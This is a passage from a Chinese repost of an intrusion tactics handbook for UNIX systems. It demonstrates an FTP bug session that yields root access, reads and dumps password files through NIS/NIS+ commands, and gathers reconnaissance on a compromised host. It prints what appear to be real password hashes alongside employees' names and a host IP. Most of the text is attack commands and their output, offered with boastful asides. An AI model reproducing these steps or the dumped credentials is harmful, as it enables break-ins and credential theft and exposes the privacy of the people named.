网络入侵实用战术手册(UNIX)(4)-网络通信专区

网络入侵实用战术手册(UNIX)(4)

作者：协议分析网编辑：王炯 2007-07-04 00:00

r-命令的信任关系建立在IP上，所以通过IP-spoofing可以获得信任;

3) rexec

类似于telnet,也必须拿到用户名和口令

4) ftp 的古老bug

# ftp -n

ftp> open victim.com

Connected to victim.com

ected to victim.com

220 victim.com FTP server ready.

ftp> quote user ftp

331 Guest login ok, send ident as password.

ftp> quote cwd ~root

530 Please login with USER and PASS.

ftp> quote pass ftp

230 Guest login ok, access restrictions apply.

ftp> ls -al / (or whatever)

(samsa:你已经是root了)

四、溜门撬锁

一旦在目标机上获得一个(普通用户)shell,能做的事情就多了

1) /etc/passwd , /etc/shadow

能看则看，能取则取，能破则破

1.1) 直接(no NIS)

$ cat /etc/passwd

......

......

1.2) NIS(yp:yellow page)

$ domainname

cas.ac.cn

$ ypwhich -d cas.ac.cn

$ ypcat passwd

1.3) NIS+

ox% domainname

ios.ac.cn

ox% nisls

ios.ac.cn:

org_dir

groups_dir

ox% nisls org_dir

org_dir.ios.ac.cn.:

passwd

group

auto_master

auto_home

auto_home

bootparams

cred

ethers

hosts

mail_aliases

sendmailvars

netmasks

netgroup

networks

protocols

rpc

services

timezone

ox% niscat passwd.org_dir

root:uop5Jji7N1T56:0:1:Super-User:/:/bin/csh:9841::::::

daemon:NP:1:1::/::6445::::::

bin:NP:2:2::/usr/bin::6445::::::

sys:NP:3:3::/::6445::::::

adm:NP:4:4:Admin:/var/adm::6445::::::

lp:NP:71:8:Line Printer Admin:/usr/spool/lp::6445::::::

smtp:NP:0:0:Mail Daemon User:/::6445::::::

uucp:NP:5:5:uucp Admin:/usr/lib/uucp::6445::::::

listen:*LK*:37:4:Network Admin:/usr/net/nls::::::::

nobody:NP:60001:60001:Nobody:/::6445::::::

noaccess:NP:60002:60002:No Access User:/::6445::::::

guest:NP:14:300:Guest:/hd2/guest:/bin/csh:10658::::::

syscd:qkPu7IcquHRRY:120:10::/usr/syscd:/bin/csh:::::::

peif:DyAkTGOg/2TCY:819:800:Pei Fei:/home/peif:/bin/csh:10491::::::

lxh:T4FjqDv0LG7uM:510:500:Liu Xuehui:/home/lxh:/bin/csh:10683::::::

fjh:5yPB5xLOibHD6:507:500:Feng Jinhui:/home/fjh:/bin/csh:10540::::::

lhj:UGAVVMvjp/9UM:509:500:Li Hongju:/home/lhj:/bin/csh:10142::::::

....

(samsa:gotcha!!!)

2) 寻找系统漏洞

2.0) 搜集信息

ox% uname -a

SunOS ox 5.5 Generic sun4d sparc SUNW,SPARCserver-1000

ox% id

uid=820(ywc) gid=800(ofc)

ox% hostname

ox

ox

ox% domainname

ios.ac.cn

ox% ifconfig -a

lo0: flags=849 mtu 8232

inet 127.0.0.1 netmask ff000000

be0: flags=863 mtu 1500

inet 159.226.5.188 netmask ffffffc0 broadcast 159.226.5.191

ipd0: flags=c0 mtu 8232

inet 0.0.0.0 netmask 0

ox% netstat -rn

Routing Table:

Destination Gateway Flags Ref Use Interface

文章转载地址：http://www.cnpaf.net/Class/hack/05121820345060733893.htm

关注我们